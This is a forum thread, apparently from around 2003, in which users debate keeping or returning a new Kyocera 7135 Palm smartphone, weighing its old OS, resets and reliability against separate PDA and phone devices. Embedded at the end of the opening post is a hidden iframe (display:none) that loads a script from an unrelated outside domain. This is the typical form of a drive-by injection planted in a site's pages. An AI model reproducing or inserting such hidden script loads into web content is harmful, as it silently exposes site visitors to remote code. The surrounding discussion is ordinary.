+ Reply to Thread

Shall I keep my new 7135 or return it?

I can't decide. I've had it a week now, and I've been waiting to get the 7135 for six months. Now that I have it, I'm facing a tough decision. For all its advantages, I have found there are also many irritating bugs. I still have a few days to decide before the 15 day return policy ends, and I guess I'm now faced with having to make a quick decision.

My real issue is this. Would I rather have two truly "state of the art" devices such as the new bluetooth and WiFi enabled Tungsten C arriving in stores next week, and partner it with a state of the art GSM bluetooth phone such as the new Nokia 3650 World Phone or the Sony Erricson 68i. Both have incredible battery life, the latest technology, Hi-res, etc., and exceptional ease of use. Alternatively, I keep the 7135 and learn to live with a compromised PDA and a compromised phone, the obvious and olny advantage being that it's an all in one device.

I know there have been endless discussions on this very subject, and I'm now faced with having to make a final decision on it myself, well at least for the next year or so.

Is anyone else facing the same decision?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Nope. What do you find compromised about the PDA? speed?

I debated on this myself, and ended up with the following opinion: pick whichever gets you the most every day usage. I was very tempted to upgrade to something that supported bluetooth / wireless, for a whole host of other applications. Being on Sprint, I was also very taken by the doohickey style phones they were coming out with in combination with Vision. Many options, many possibilities for ways I could go.

In the end, I picked the 7135, because I would be using my Palm and phone more every day as one unit than if they were separate. (Some days I found it hard to carry my Palm around everywhere.) It's an odd question, because the answer really depends on your individual needs. Just my thought!

Originally posted by Quick
    Nope. What do you find compromised about the PDA? speed?

Speed. Smaller, Low Res screen. Poor battery life. Older Palm OS. No truly one handed operation (almost always have to use the stylus, even with 1 Button Pro). Many bugs. Unresponsive keypad ... I'm coming from a Tungtsen. If they'd never brought that out, maybe I wouldn't notice the compromises so much.

It sounds like I hate this phone. I don't. I think it has a lot going for it. But the above issues are making this a tough decision for me.

jeh
    I'm thnking along the same lines. I'm thinking that since the PDA functions are very important to me, maybe it's worth spending the $400 on a Tungsten T instead of on another phone. Not to mention the fact that future upgrades get a lot easier when you can upgrade just the PDA or the phone, and not have to find the best set of compromises in a combined unit.

I agree with rodionpunk. It depends on your needs. I need a phone and a palm. I find that it is easier to cary just one device. But then I am not a heavy duty user of either. So do what works best for you. Just because you have been waiting for this device, does not mean you have to decide it is the best for you or even very good.
    Walt

If you keep your 7135 I think, with time, you'll learn how to cope with its limitations. True its not a state-of-the-art phone or a state-of-the-art Palm. And its FAR from a state-of-the-art MP3 player (although its MP3 capabilities are going to get better soon thanks to the efforts of our own Palmnut!) But its certainly THE state-of-the-art Phone/Palm/MP3 player and I wouldn't trade it for two or three dedicated devices. (I also wouldn't want a GSM phone. For better or worse, I'm sticking with Verizon and CDMA.)

Originally posted by Jeremy
    ... I'm coming from a Tungtsen. If they'd never brought that out, maybe I wouldn't notice the compromises so much.
    Ahh, that could be a big factor. I came off a Palm Vx which I've used heavily for 4? years and still almost met my needs. Color alone is a huge improvement for me. The smaller screen is actually more readable due to the great backlight and sharpness. The move to 16MB *and* the expansion card more than solved my memory problems. So I was on the verge of having to replace my Palm anyway and the convergence thing is just the ticket for me. I figure I'm set for another 3 or 4 years. ...make note to self to never try anbody's Tungsten...

-Quick

Jeremy, it sounds like this device is a downgrade for you and maybe not the right choice. I'm along with a lot of people who don't want to carry a bulky palm around along with a phone and also keep both charged up. I use the palm a lot more now with the 7135 than I did with my 6035 because the screen is great and now that I have expandable memory, I can use more apps and save more data. I don't think the screen size, resolution or 4.1 palm software is any compromise for me. It seems to do everything I need and has been viturally trouble free. Good luck with whatever choice you make.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Tomorrow is my final day to return the 7135 for a full refund. I'm really torn about what to do. I love the phone, I can live with it's old Palm OS and low res screen, but my REAL ISSUE is reliability. Though I haven't had to do a hard reset or had too many other major issues YET ... it looks like so, so, so, so many people have had MAJOR ISSUES inluding reverse or black screen of death, hard resets, having to retunr their brtand new phone for a refurbished one ... etc.

I'm really nervous about committing to two years with what is clearly a very unstable combination of hardware and software. This is my only issue. I know that no one here can decide for me, I'm just voicing my concerns. I wonder how many people here who have passed their two week return policy, now regret it.

I think you should return it. It is only going be upsetting to you down the road. If you aren't thrilled about the thing and can't really afford to spend time and money on something of this caliber and later get something else, you should not hang on to it.

There is no way in heck, I'm returning, sellling, or donating my 7135 until there is something better out. That doesn't mean that you should do the same though.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

jeh
    > If you keep your 7135 I think, with time, you'll learn how to
    > cope with its limitations.

For $400 I shouldn't have to do that. If it cost $150 or so that would be a much stronger position.

Originally posted by jeh
    For $400 I shouldn't have to do that. If it cost $150 or so that would be a much stronger position.
    I agree. If you feel that way about a $400 phone, don't hesitate -- return it.

Originally posted by jeh
    > If you keep your 7135 I think, with time, you'll learn how to
    > cope with its limitations.

Mossberg says that the Treo is $150 now......... many more limitations for much less money! :p
    Please visit my picture site: Robert-O-Rama :)

jeh
    The Treo at that price would actually be a good option if I thought Sprint had decent coverage. But afai can tell, they don't.

jeh
    Mine just locked up again (only soft reset needed, no data loss) for the fourth time since I got it. This time it was apparently during voice mail notification: I got a call; I ignored the call, the caller left voice mail, I got the voice mail beep... when I got to where I was going and parked the car I reached for the phone and was surprised to see that the top LCD backlight was still on. I opened it up and the "Fatal exception" dialog had overlaid the "new voice mail message" notification box. Ick.

The UI issues I'm sure I can get used to (after all I used to use a StarTac, which was much less functional). But the stability... Four resets in 13 days (really 11 days, since I didn't have time to get into the phone when it first arrived) isn't a huge number but then again my 6035, with much the same collection of apps and hacks, would probably see four resets in 13 months. I can live with a reset or two a week, but with the large number of problems reported here (at a far higher rate than were ever reported for the 6035), will my phone continue to be "only this unstable"? Or will it degrade into hard lockups with data loss like some of the others? I obviously can't know.

But I'm strongly leaning toward "return" at this point. It just hasn't given me the feeling of confidence that the 6035 did in its first weeks. For $400 I think expecting such confidence is completely reasonable.

The pain is that if I'm going to RMA it, tomorrow is the last day. 15 days really isn't long enough to stress-test the 7135. Oh well, I can always order another one, maybe after the bugs are worked out.

Actually for me (YMMV), the 7135 seems a bit less freeze-prone than the 6035.

On my 6035, I would have these annoying, repeatable problems that I never had a resolution for:
    - If I changed the Expense category for call logging, it locked up as soon as I exited the call history app. I changed categories quite often because I wanted to log weekend calls in a different category.
    - Often I went to edit the Launcher categories, and it locked up before I could change anything. I had to delete psysLaunchDB and re-categorize everything.
    - If I power on the phone using the dialer app with flip open, then close the flip immediately so I can put it in my holster, it would lock. I had to wait a few seconds before closing the flip.

I decided to keep it.

So I began this thread with my own uncertainty about whether or not to return the phone. I decided to keep it. I have yet to have a major problem, and if or when I do, I'll cross that bridge then. I will purchase the insurance, or else add the phone to my renter's policy, to safeguard myself.

So far, my unit has been very stable, but then I've had the benefit of this forum to avoid some potential problems, such as the whole Quick Office/Snappermail upgrade fiasco, etc. I've waited for years for a good smartphone, and have resisted the earlier models because they just didn't quite cut it for me. This device is so close to primetime, I decided my long wait is over. The fact that I didn't have to go through the hassle of changing my mobile number also helped my decision (I've been with Verizon for years, and AirTouch before then until Verizon took them over.) Of course, I can't wait for smartphones to evolve into even better and more stable devices, but just like digital cameras once they hit the 2 megapixel barrier, I decided, it's time. This is a truly functional device and a fun "toy", and despite what HP thinks, IMHO, smartphones are the future.

jeh

Not ready for prime time.

So! On the morning of the 15th day. I'm driving into my client. And it happens I really need to be able to get voice mail today. I've had maybe half a dozen resets in the two weeks but I'm thinking, hmm, maybe I'll keep it after all.

While at a stoplight I open the phone. It's completely dark and nonresponsive.

Once at the client I try again. Completely dead. No response to the reset button.

Switch batteries. Palm resets, seems to light up and begin setup... and then dies again.

I open the battery door. The battery isn't noticeably warm. But UNDER the battery sure is, esp. in the upper right corner. This spot also emits the distinctive smell of vaporized epoxy resin (IC packaging material).

Needless to say, it's going back -- for a refund, not a replacement. Maybe I'll try again in six months. In the meantime, it's back to my reliable 6035.